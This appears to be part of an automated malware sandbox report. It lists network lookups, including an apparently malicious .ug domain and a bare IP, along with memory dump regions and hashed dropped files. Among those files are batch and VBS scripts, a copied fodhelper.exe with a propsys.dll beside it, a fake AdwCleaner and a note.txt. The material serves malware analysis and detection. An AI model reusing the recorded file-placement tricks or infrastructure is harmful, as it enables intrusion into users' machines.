US 8.8.8.8:53 collector.github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
CA 69.50.175.178:80 tcp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:80 google.co.ck tcp
GB 172.217.16.228:80 google.co.ck tcp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:443 google.co.ck tcp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.4:443 www.google.com tcp
GB 142.250.178.4:443 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:443 google.co.ck tcp
US 8.8.8.8:53 4.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 tamerimia.ug udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:443 google.co.ck udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
NL 72.246.173.187:443 www.microsoft.com tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 23.62.61.155:443 www.bing.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
GB 142.250.179.227:443 www.google.co.ck tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
GB 142.250.179.227:443 www.google.co.ck tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp

Files

memory/2668-0-0x0000000000F00000-0x0000000000F6E000-memory.dmp

memory/2668-1-0x0000000074C50000-0x0000000075400000-memory.dmp

memory/2668-2-0x0000000005E80000-0x0000000006424000-memory.dmp

memory/2668-3-0x00000000059B0000-0x0000000005A42000-memory.dmp

memory/2668-4-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/2668-5-0x0000000005970000-0x000000000597A000-memory.dmp

memory/2668-6-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/2668-14-0x0000000074C50000-0x0000000075400000-memory.dmp

memory/2668-15-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/2668-16-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/4924-17-0x0000000002300000-0x0000000002301000-memory.dmp

memory/3556-18-0x0000000000650000-0x0000000000651000-memory.dmp

memory/1364-20-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/1364-21-0x00000000006B0000-0x00000000006B1000-memory.dmp

memory/4924-54-0x0000000002300000-0x0000000002301000-memory.dmp

memory/3556-59-0x0000000000650000-0x0000000000651000-memory.dmp

memory/1364-1725-0x0000000010410000-0x000000001047E000-memory.dmp

memory/3004-1727-0x0000000010410000-0x000000001047E000-memory.dmp

memory/1904-1740-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

memory/1904-1742-0x0000000000B70000-0x0000000000B71000-memory.dmp

memory/1904-1748-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

memory/1364-1751-0x0000000010410000-0x000000001047E000-memory.dmp

memory/3004-1754-0x0000000010410000-0x000000001047E000-memory.dmp

memory/1904-1755-0x0000000002730000-0x0000000002731000-memory.dmp

memory/2588-1780-0x00000000006E0000-0x00000000006E1000-memory.dmp

memory/2588-1781-0x00000000007D0000-0x00000000007D1000-memory.dmp

memory/2588-1796-0x0000000000760000-0x0000000000761000-memory.dmp

memory/2588-1815-0x0000000002590000-0x0000000002591000-memory.dmp

memory/1904-2203-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/6532-2250-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Public\Natso.bat

MD5 5cc1682955fd9f5800a8f1530c9a4334
SHA1 e09b6a4d729f2f4760ee42520ec30c3192c85548
SHA256 5562cc607d2f698327efacc4a21bd079bb14a99b03e7a01b3c67f8440e341cb3
SHA512 80767263aad44c739236161d4338d5dd8b0b58613f22cd173c3e88ebf143220ee56bbf93ace69a07d3c2f00daff0adbaa8461a1d53d12699725395c931c43cb6

C:\Users\Public\x.vbs

MD5 70f4e3618d69b36ca74f412ac75ec1fa
SHA1 59fb651c5c976c86f3e02811b0250ca7dc10eb3a
SHA256 c120ecbb33c2092fe379bcd2edbd702ea0a571ec99c233f8441e70e8ac62efd9
SHA512 fa4aa79f35d4d5999f5237aaf46314a2de0c88ba8ea3c4a33be50fbeb53d9bb201033965e4aee17be13081a082daaaed3aae5c84181f24e9723b762a453bf191

C:\Users\Public\x.bat

MD5 47b8b6e888806f25ee24e55a6b116262
SHA1 1fbb022a6c3183f21806c19230a8ad421df9a2ae
SHA256 61e8f32d99ac46e7eab3e976b0afcadc55ad837d696f0b2a003fe9cd4f34335e
SHA512 a240e3b7f1a529da2dba304786da101548a039306c63f28c34f60973319ba37564e51493d021cd2c2adae4eecd98e8d6dd80e8b46472a6f6e7d1b069d000317a

C:\Users\Public\cde.bat

MD5 b442a70fdba934a802a468446c697646
SHA1 fe28bd0ab4831dc3bd71b774bdfac829b8806a35
SHA256 c8dbdd9043f83f13287d442bcd98d06376d19a1d82f4e1dd4c9449f9b2ae0c7d
SHA512 47b6d6396db728ad358c8104632f2be9e305ae674f2b08d501a68cded63c462316cdd18e861d9d411958b1012aaac4620239ca6029db6112285a8e06134d1903

memory/2588-2275-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/1364-2300-0x0000000010410000-0x000000001047E000-memory.dmp

memory/6296-2301-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/3116-2313-0x00000000003C0000-0x00000000003EE000-memory.dmp

memory/3116-2314-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/3116-2315-0x000000001B100000-0x000000001B110000-memory.dmp

memory/8156-2318-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2319-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/7208-2320-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/3116-2321-0x000000001B100000-0x000000001B110000-memory.dmp

memory/7208-2322-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2323-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/1904-2324-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/6532-2325-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3116-2326-0x000000001B100000-0x000000001B110000-memory.dmp

memory/2588-2327-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/3116-2328-0x000000001B100000-0x000000001B110000-memory.dmp

memory/8156-2329-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/8156-2331-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/8156-2330-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/7208-2332-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/3116-2333-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2334-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2335-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/8156-2336-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/7208-2337-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/3116-2338-0x000000001B100000-0x000000001B110000-memory.dmp

memory/7208-2346-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2347-0x0000000000E20000-0x0000000000E30000-memory.dmp

C:\Users\Public\fodhelper.exe

MD5 7215c73ec1aae35b9e4b1f22c811f85c
SHA1 98551f5184691b65dceba531c4e4975d77cd25a5
SHA256 7e80da8d839dcf05e30317256460ed7a4ee25cab2750d768569aaab35e1e8c64
SHA512 b68eed48dbd32e485fd56b952e3e642f25f1eefe26ea533b13857e225272ee9668c39552284a438175a323d1685a80d9f878ef0637b5d928bb1e1ed1ac505d61

C:\Users\Public\propsys.dll

MD5 487766bf2f0add388cb123d1ef7ece46
SHA1 766564c04d9e8a6745baa2ad28da5d68ad1d79bf
SHA256 fa5d5f9bd3a3aece8941e52a00d05db8910d3332f4f276bc03663c7944ae11cb
SHA512 3b5c285c4eb749c5e34405b38e146e9fc3fe28c535ee12c4e0f075e167768f37b588e50c2dbd43a27b67b11e7483ad51fcd6b6e7638059dd40bc303c664a8a7e

C:\Users\Public\Runex.bat

MD5 f6828e22e6abe87c624e4683fac5889b
SHA1 b93d63354d4ddb226dab90955576a6d2cad05ba0
SHA256 e1b1884353a51436f90dfed9f85ed9dd98fccfbd13dee7aa54fd901f77fe5e9c
SHA512 26afb36afcb3f286b85ebd72061e26f84c33075d3d0767cc93f50ec414a85838c86049e0c56ff43011d1a309b98ae355cbe412203429ac243010dc971ac81ec1

memory/7208-2369-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/208-2376-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/208-2375-0x0000019C2BC10000-0x0000019C2BC32000-memory.dmp

memory/208-2377-0x0000019C2BC00000-0x0000019C2BC10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aafivkcb.iie.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3116-2382-0x000000001B100000-0x000000001B110000-memory.dmp

memory/3116-2383-0x000000001B100000-0x000000001B110000-memory.dmp

memory/208-2384-0x0000019C2BC00000-0x0000019C2BC10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6AdwCleaner.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

C:\note.txt

MD5 afa6955439b8d516721231029fb9ca1b
SHA1 087a043cc123c0c0df2ffadcf8e71e3ac86bbae9
SHA256 8e9f20f6864c66576536c0b866c6ffdcf11397db67fe120e972e244c3c022270
SHA512 5da21a31fbc4e8250dffed30f66b896bdf007ac91948140334fe36a3f010e1bac3e70a07e9f3eb9da8633189091fd5cadcabbaacd3e01da0fe7ae28a11b3dddf

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

MD5 f33a4e991a11baf336a2324f700d874d
SHA1 9da1891a164f2fc0a88d0de1ba397585b455b0f4
SHA256 a87524035509ff7aa277788e1a9485618665b7da35044d70c41ec0f118f3dfd7
SHA512 edf066968f31451e21c7c21d3f54b03fd5827a8526940c1e449aad7f99624577cbc6432deba49bb86e96ac275f5900dcef8d7623855eb3c808e084601ee1df20